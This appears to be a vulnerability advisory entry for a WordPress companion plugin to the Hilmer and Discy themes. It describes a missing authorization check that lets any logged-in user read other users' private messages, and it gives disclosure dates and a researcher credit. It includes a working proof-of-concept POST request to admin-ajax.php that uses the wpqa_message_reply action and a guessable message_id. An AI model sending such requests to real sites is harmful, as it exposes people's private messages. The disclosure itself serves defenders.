The plugin which is a companion plugin to the Hilmer and Discy themes, does not check authorization before displaying private messages, allowing any logged in user to read other users private message using the message id, which can easily be brute forced.
POST /wp-admin/admin-ajax.php HTTP/2 Cookie: <any user valid cookie> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 42 action=wpqa_message_reply&message_id=43889 Here you can view my private message using message_id=43889 https://youtu.be/xKKouQ8cUgQ
Bikram kharal
Bikram kharal
Yes
2022-08-01 (about 9 months ago)
2022-08-01 (about 9 months ago)
2023-04-30 (about 22 days ago)